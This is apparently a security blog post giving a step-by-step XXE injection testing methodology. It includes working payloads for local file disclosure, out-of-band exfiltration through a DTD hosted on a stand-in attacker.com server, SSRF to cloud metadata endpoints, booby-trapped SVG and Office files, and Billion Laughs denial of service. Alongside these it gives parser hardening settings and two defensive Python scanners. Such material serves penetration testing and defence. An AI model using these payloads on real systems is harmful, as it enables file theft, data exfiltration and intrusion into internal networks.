
Introduction:
XML External Entity (XXE) injection remains one of the most underestimated yet devastating vulnerabilities in modern web applications. Attackers leverage improperly secured XML parsers to read local files, perform server-side request forgery (SSRF), launch denial-of-service attacks, or exfiltrate sensitive data through out-of-band channels. With the resurgence of XML in legacy SOAP services, SAML authentication, and even modern REST APIs that accept `application/xml`, every penetration tester must master a systematic XXE testing methodology.
Learning Objectives:
– Identify all potential XML input vectors across APIs, file uploads, and mobile traffic.
– Execute blind XXE attacks using OOB data exfiltration and error-based techniques.
– Apply mitigation strategies including secure parser configuration and input validation.
1. Mapping the Attack Surface: Discovering XML Input Points
Before firing payloads, you must locate every endpoint that processes XML. Many testers focus only on `Content-Type: application/xml`, but XXE lurks in unexpected places.
Step‑by‑Step Guide:
1. Inspect API documentation – Look for SOAP endpoints (typically `/soap`, `/webservice`, `/api/v1/soap`) and REST endpoints that advertise `application/xml` or `text/xml` in `Accept` or `Content-Type` headers.
2. Analyze file upload features – Upload a simple `test.xml` file and observe how the server responds. Also test SVG images (which are XML), Office Open XML documents (`.docx`, `.xlsx`, `.pptx` – rename to `.zip` to inspect embedded XML), and configuration files like `.config`, `.wsdl`, or `.rss`.
3. Monitor mobile app traffic – Use Burp Suite or mitmproxy to intercept requests. Many mobile backends still use XML-based protocols even when the UI is JSON.
4. Check SAML authentication – Decode SAML requests/responses (Base64). If they contain XML, attempt XXE during single sign-on flows.
Useful Commands:
– Linux – Recursively search for XML endpoints in source code:
`grep -rni "text/xml\|application/xml\|\.wsdl" /path/to/codebase`
– Windows – Find SOAP endpoints in IIS logs:
`findstr /i "soap .wsdl" C:\inetpub\logs\LogFiles\.log`
– Burp Suite – Configure passive scanning for XML content types under Target > Scope.
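As an added example that is not part of the original post, the following Python 3 script applies steps 1 to 4 above to a batch of HTTP requests (constructed sample traffic; the hosts, paths and SAML bodies are illustrative only): it flags XML content types, WSDL resources, uploads of XML-based file types, and SAML parameters whose Base64 (HTTP-POST binding) or raw-DEFLATE-plus-Base64 (HTTP-Redirect binding) value decodes to XML. Function names such as `find_xml_vectors` and `decode_saml` are this example's own.

```python
import base64
import binascii
import re
import zlib
from urllib.parse import parse_qs, quote, urlparse

# Content types that are handed to an XML parser: text/xml, application/xml,
# application/soap+xml, application/atom+xml, image/svg+xml, ...
XML_CONTENT_TYPE = re.compile(r"(application|text)/[\w.+-]*xml|image/svg\+xml", re.I)
# Upload extensions that are XML, or zipped XML (Office Open XML).
XML_EXTENSIONS = (".xml", ".svg", ".docx", ".xlsx", ".pptx", ".wsdl", ".rss", ".config")
UPLOAD_FILENAME = re.compile(r'filename="([^"]+)"')


def looks_like_xml(data: bytes) -> bool:
    return data.lstrip().startswith(b"<")


def decode_saml(value: str):
    """Return the XML carried by a SAMLRequest/SAMLResponse value, or None.
    HTTP-POST binding is plain Base64; HTTP-Redirect binding is raw DEFLATE, then Base64."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if looks_like_xml(raw):
        return raw
    try:
        inflated = zlib.decompress(raw, -15)  # -15: raw DEFLATE stream without a zlib header
    except zlib.error:
        return None
    return inflated if looks_like_xml(inflated) else None


def find_xml_vectors(requests):
    """Return (path, reason) for every request that reaches an XML parser."""
    vectors = []
    for req in requests:
        url = urlparse(req["path"])
        content_type = req["headers"].get("Content-Type", "")
        if XML_CONTENT_TYPE.search(content_type):
            vectors.append((url.path, "XML content type: " + content_type.split(";")[0].strip()))
        if url.query.lower() == "wsdl" or url.path.lower().endswith((".wsdl", ".xml")):
            vectors.append((url.path, "WSDL/XML resource"))
        for name in UPLOAD_FILENAME.findall(req["body"]):
            if name.lower().endswith(XML_EXTENSIONS):
                vectors.append((url.path, "upload of XML-based file: " + name))
        params = parse_qs(url.query)
        if content_type.startswith("application/x-www-form-urlencoded"):
            params.update(parse_qs(req["body"]))
        for key in ("SAMLRequest", "SAMLResponse"):
            for value in params.get(key, []):
                if decode_saml(value) is not None:
                    vectors.append((url.path, key + " parameter carries XML"))
    return vectors


def _redirect_binding(xml: bytes) -> str:
    """Encode XML the way the SAML HTTP-Redirect binding does (raw DEFLATE + Base64)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(xml) + comp.flush()).decode()


# Constructed sample traffic: none of these hosts, paths or assertions are real.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/api/v1/soap",
     "headers": {"Content-Type": "text/xml; charset=utf-8"}, "body": "<Envelope/>"},
    {"method": "POST", "path": "/api/orders",
     "headers": {"Content-Type": "application/json"}, "body": "{}"},
    {"method": "GET", "path": "/service?wsdl", "headers": {}, "body": ""},
    {"method": "POST", "path": "/upload",
     "headers": {"Content-Type": "multipart/form-data; boundary=xyz"},
     "body": 'Content-Disposition: form-data; name="file"; filename="logo.svg"\r\n\r\n<svg/>'},
    {"method": "POST", "path": "/sso/acs",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "SAMLResponse=" + quote(base64.b64encode(b'<samlp:Response ID="_1"/>').decode())},
    {"method": "GET",
     "path": "/sso/login?SAMLRequest=" + quote(_redirect_binding(b'<samlp:AuthnRequest ID="_2"/>')),
     "headers": {}, "body": ""},
]

if __name__ == "__main__":
    for path, reason in find_xml_vectors(SAMPLE_REQUESTS):
        print(f"{path:15} {reason}")
```

Feed it the request records exported from Burp or mitmproxy and the result is the inventory that section 2 onwards tests against; the JSON endpoint in the sample is deliberately left out of the output to show that content-type alone decides nothing about the SAML and upload vectors.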
2. Basic XXE Exploitation for Local File Disclosure
Once you identify an XML parser, test for classic XXE by defining an external entity pointing to a local file. Success is indicated when file contents appear in the response, error messages, or generated output (e.g., PDF invoices, HTML reports).
Step‑by‑Step Guide:
1. Inject the following DOCTYPE declaration ahead of the root element and reference the entity from any XML element value:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root>
2. For Windows targets, use `file:///c:/windows/win.ini` or `file:///c:/boot.ini`.
3. If the application displays the XML output, the file contents appear directly.
4. If the parser is non‑validating but still resolves entities, try:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "file:///etc/hosts"> %xxe; ]>
5. Test error-based disclosure – Reference a non‑existent file to trigger verbose errors:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///nonexistent.txt"> ]>
Commands to Verify Local File Paths (Linux/Windows):
– Linux – Common sensitive files: `/etc/passwd`, `/etc/shadow`, `/etc/hosts`, `/proc/self/environ`
– Windows – Common files: `C:\Windows\win.ini`, `C:\Windows\System32\drivers\etc\hosts`, `C:\inetpub\wwwroot\web.config`
– Test with cURL:
`curl -X POST https://target.com/api/xml -H "Content-Type: application/xml" -d "@/payload.xml"`
3. Blind XXE Out‑of‑Band (OOB) Exfiltration
When file contents are not reflected in responses, use blind XXE with a remote server you control. The parser will issue DNS/HTTP requests to your server, potentially leaking data via parameter entities.
Step‑by‑Step Guide:
1. Set up a listener – Use Python’s HTTP server on your attacking machine:
– Linux: `python3 -m http.server 8080` or `sudo nc -lnvp 80`
– Windows (PowerShell): `python -m http.server 8080` or using `netcat` for Windows.
2. Create an external DTD file (e.g., `oob.dtd`) hosted at `http://attacker.com/oob.dtd`:
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com:8080/?data=%file;'>"> %eval; %exfil;
3. Inject the following payload into the target XML:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.com/oob.dtd"> %xxe; ]>
4. Monitor your listener logs. If successful, you will see HTTP requests containing the file data (e.g., `?data=root:x:0:0…`).
5. For blind SSRF via OOB – Replace the DTD with a request to internal services (e.g., `http://169.254.169.254/latest/meta-data/` on AWS).
Tool Configurations:
– Burp Collaborator – Built‑in OOB detection. Insert `http://YOUR-COLLABORATOR-ID.burpcollaborator.net` as the external server.
– Ngrok – Expose your local listener: `ngrok http 8080`
4. SSRF via XXE: Pivoting to Internal Networks
XXE can be weaponized to scan internal networks, access cloud metadata APIs, and exploit internal services that are not internet‑facing.
Step‑by‑Step Guide:
1. Replace the file URI with an internal HTTP address:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]> <root>&xxe;</root>
2. Test for timing differences – Compare `http://10.0.0.1:8080` with `http://10.0.0.1:9999` (a closed port). A consistent difference in response latency indicates whether the port is open.
3. Exploit internal Redis/Memcached – Send malicious commands via `http://internal-redis:6379/` using CRLF injection in the URI.
4. Bypass SSRF filters – Use alternative schemes: `gopher://`, `dict://`, `ftp://`. Example for internal Elasticsearch:
<!ENTITY xxe SYSTEM "gopher://elasticsearch:9200/_search">
5. Cloud metadata protection bypass – Many cloud providers block the standard endpoint. Try:
– AWS: `http://169.254.169.254/latest/user-data/`
– GCP: `http://metadata.google.internal/computeMetadata/v1/`
– Azure: `http://169.254.169.254/metadata/instance?api-version=2017-08-01` (add `Metadata: true` header if possible)
Mitigation Commands (for defenders):
– Linux iptables – Block outgoing requests to internal IP ranges from application servers:
`iptables -A OUTPUT -d 169.254.0.0/16 -j DROP`
(This also blocks the host's own link-local traffic, including legitimate metadata lookups; scope the rule to the application account with `-m owner --uid-owner <app-user>` if the host itself needs the metadata service.)
– AWS Security Group – Restrict egress to metadata service via VPC endpoint policies. Note that security groups do not filter traffic to 169.254.169.254; enforcing IMDSv2, whose session token must be obtained with a PUT request that an entity fetch cannot send, is the control that actually stops XXE- and SSRF-driven metadata reads.
5. File Upload XXE: SVG, Office Documents, and Archives
File upload features are prime XXE vectors because they often parse XML metadata without proper sanitization.
Step‑by‑Step Guide:
1. Craft a malicious SVG (save as `evil.svg`):
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg width="100" height="100" xmlns="http://www.w3.org/2000/svg"> <text x="10" y="20">&xxe;</text> </svg>
2. Upload the SVG – If the server generates thumbnails, the file contents appear inside the image description or error.
3. For Office documents (`.docx`, `.xlsx`):
– Extract the archive: `unzip document.docx -d docx_src`
– Edit `docx_src/word/document.xml` to inject the XXE payload.
– Repack: `cd docx_src && zip -r ../poc.docx .`
– Upload the modified document.
4. Test XML-based import/export features – Many enterprise apps allow bulk XML uploads (e.g., system configuration exports). Use the same external entity payload.
5. Monitor for asynchronous processing – The XXE may trigger hours later when a batch job reads the uploaded file.
Linux/Windows Commands for Payload Generation:
– Linux – Create ZIP with modified XML:
`unzip invoice.docx -d invoice/ && sed -i 's/INVOICE_DATA//' invoice/word/document.xml && cd invoice && zip -r ../evil.docx .`
– Windows PowerShell – Extract and repack:
`Copy-Item invoice.docx invoice.zip; Expand-Archive invoice.zip invoice; (Get-Content invoice\word\document.xml) -replace "OLD", "PAYLOAD" | Set-Content invoice\word\document.xml; Compress-Archive -Path invoice\* -DestinationPath evil.zip; Rename-Item evil.zip evil.docx`
(The archive cmdlets only handle the `.zip` extension, hence the copy and the final rename; `-Path invoice\*` keeps the package root flat, which Office requires.)
6. Parameter Entities and Chained Expansion
Parameter entities (defined with `%`) allow recursive attacks, including XML bombs (denial of service) and multi‑step exfiltration when direct file inclusion is blocked.
Step‑by‑Step Guide:
1. Test if parameter entities are enabled:
<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % test "Hello"> %test; ]> <root>test</root>
If the parser doesn’t crash, parameter entities are supported.
2. Chain entities to bypass validation – Use an external DTD to perform double expansion:
– Local payload: ` %xxe; ]>`
– External `chain.dtd`:
<!ENTITY % param1 SYSTEM "file:///etc/passwd"> <!ENTITY % param2 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?%param1;'>"> %param2; %exfil;
3. Test Billion Laughs attack (DoS) – Use with caution:
<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;"> ... ]>
4. Monitor CPU/memory usage – This can crash the server, so only perform on authorized test systems.
Mitigation (for developers):
– Disable external entity processing – Java (SAXParserFactory): `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`
– Python (lxml): `parser = etree.XMLParser(resolve_entities=False, no_network=True)`
– .NET: `XmlReaderSettings settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Prohibit;`
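As an added example (not code from the original post), the following Python 3 inspector implements the deny-by-default stance of the settings above using the standard library's expat bindings, and serves sections 2 to 5 as well: it records the DOCTYPE, every declared entity that carries a SYSTEM identifier (classified as local file, link-local metadata address, private address or external network) and every external entity reference, without ever fetching anything, and applies that check to raw XML/SVG uploads and to each XML part of an Office Open XML package. The payload samples, the `attacker.example` host and `build_ooxml` (a minimal zip, not a real Office file) are constructed for this example; the function names are the example's own.

```python
import io
import ipaddress
import zipfile
import xml.parsers.expat as expat
from urllib.parse import urlparse


def classify_uri(uri: str) -> str:
    """Describe where a SYSTEM identifier would send the parser, without fetching it."""
    parts = urlparse(uri)
    if parts.scheme in ("", "file"):
        return "local file"
    try:
        ip = ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return f"network ({parts.scheme})"
    if ip.is_link_local:
        return "link-local address (cloud metadata range)"
    if ip.is_private or ip.is_loopback:
        return "private/loopback address"
    return f"network ({parts.scheme})"


def inspect_xml(data: bytes) -> dict:
    """Parse with expat callbacks only: record the DOCTYPE, every declared entity and
    every external entity reference, but never resolve a file or URL."""
    findings = {"doctype": False, "entities": [], "referenced": [], "internal_entities": 0, "error": None}
    parser = expat.ParserCreate()
    # External DTDs / parameter entities are never fetched (covers the OOB and chained-DTD cases).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def start_doctype(name, sysid, pubid, has_internal_subset):
        findings["doctype"] = True
        if sysid:  # <!DOCTYPE root SYSTEM "..."> points at an external DTD
            findings["entities"].append(("DOCTYPE", sysid, classify_uri(sysid)))

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid:
            findings["entities"].append(("%" + name if is_param else name, sysid, classify_uri(sysid)))
        else:  # internal entity: the building block of a Billion Laughs document
            findings["internal_entities"] += 1

    def external_ref(context, base, sysid, pubid):
        findings["referenced"].append(sysid)
        return 1  # report "handled" so parsing continues with an empty replacement text

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        findings["error"] = str(exc)
    return findings


XML_PARTS = (".xml", ".rels", ".svg")


def inspect_upload(filename: str, data: bytes) -> list:
    """Inspect an upload: every XML part of an Office Open XML zip, or the file itself."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return [(name, inspect_xml(archive.read(name)))
                    for name in archive.namelist() if name.lower().endswith(XML_PARTS)]
    return [(filename, inspect_xml(data))]


def is_acceptable(report: list) -> bool:
    """Deny-by-default policy (the disallow-doctype-decl equivalent): any DOCTYPE or parse error rejects the upload."""
    return all(not f["doctype"] and f["error"] is None for _, f in report)


def build_ooxml(document_xml: bytes) -> bytes:
    """Constructed minimal Office-style package (not a real .docx), enough to exercise the scanner offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml",
                         b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        archive.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed samples mirroring the payload shapes of sections 2-4; attacker.example is a placeholder host.
CLASSIC = b'<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>'
OOB = b'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.example/oob.dtd"> %xxe; ]><root/>'
METADATA = b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]><root>&xxe;</root>'
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><text x="10" y="20">ok</text></svg>'

if __name__ == "__main__":
    for label, sample in (("classic", CLASSIC), ("oob", OOB), ("metadata", METADATA)):
        print(label, inspect_xml(sample))
    print("poc.docx accepted:", is_acceptable(inspect_upload("poc.docx", build_ooxml(CLASSIC))))
    print("logo.svg accepted:", is_acceptable(inspect_upload("logo.svg", BENIGN_SVG)))
```

`is_acceptable` is the gate: it refuses any DOCTYPE at all, which is the same stance as `disallow-doctype-decl`, `resolve_entities=False` and `DtdProcessing.Prohibit`. The findings dictionary is what an upload endpoint should log, so that a rejected document's target (a `file:///` path, a 169.254.169.254 URL, an external DTD host) shows up in detection rather than being silently dropped.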
What Undercode Says:
– Key Takeaway 1 – XXE is not a legacy issue. Modern single-page applications that accept XML for backward compatibility, cloud metadata endpoints, and even CI/CD pipelines processing XML reports remain critically exposed.
– Key Takeaway 2 – Blind XXE with OOB exfiltration is the most reliable technique in 2026, but many pentesters skip it because they lack a proper listener infrastructure. A simple HTTP server or Burp Collaborator can turn a “no output” case into full compromise.
Analysis (10 lines):
The original checklist covers the essential phases of XXE testing but lacks concrete command-level examples and mitigation strategies. By extending it with Linux/Windows commands and real‑world payloads, we bridge the gap between theory and execution. XXE often goes undetected because modern security tools focus on SQLi and XSS. However, XML parsers are rarely upgraded in legacy internal applications, and cloud metadata endpoints remain prime targets. A single XXE can lead to RCE via SSRF into internal Jenkins, Docker APIs, or Redis. Defenders must adopt a “deny by default” policy for external entities and regularly fuzz file upload endpoints. Moreover, development teams should migrate away from XML for new services; for existing ones, they should use safe parser configurations and network egress controls. The rise of AI‑generated code has reintroduced outdated XML libraries in prototype applications, making XXE a recurring finding in bug bounty programs.
Prediction:
– -1 Resurgence of XML in microservices – As organizations adopt API gateways and legacy SOAP wrappers for mainframe integration, misconfigured XML parsers will spike, leading to critical SSRF breaches in cloud environments by 2027.
– +1 Automated XXE discovery tools – Next‑generation fuzzers will integrate parameter‑entity chaining and OOB callback detection, reducing manual effort and increasing bug bounty payouts for researchers.
– -1 AI‑generated code vulnerability – Large language models frequently output XML processing code with insecure default configurations (e.g., `resolve_entities=True` in Python), causing a new wave of XXE in otherwise secure applications.
IT/Security Reporter URL:
Reported By: [Deepmarketer Xxe](https://www.linkedin.com/posts/deepmarketer_xxe-testing-checklist-ugcPost-7468106978737823746-T3zW/) – Hackers Feeds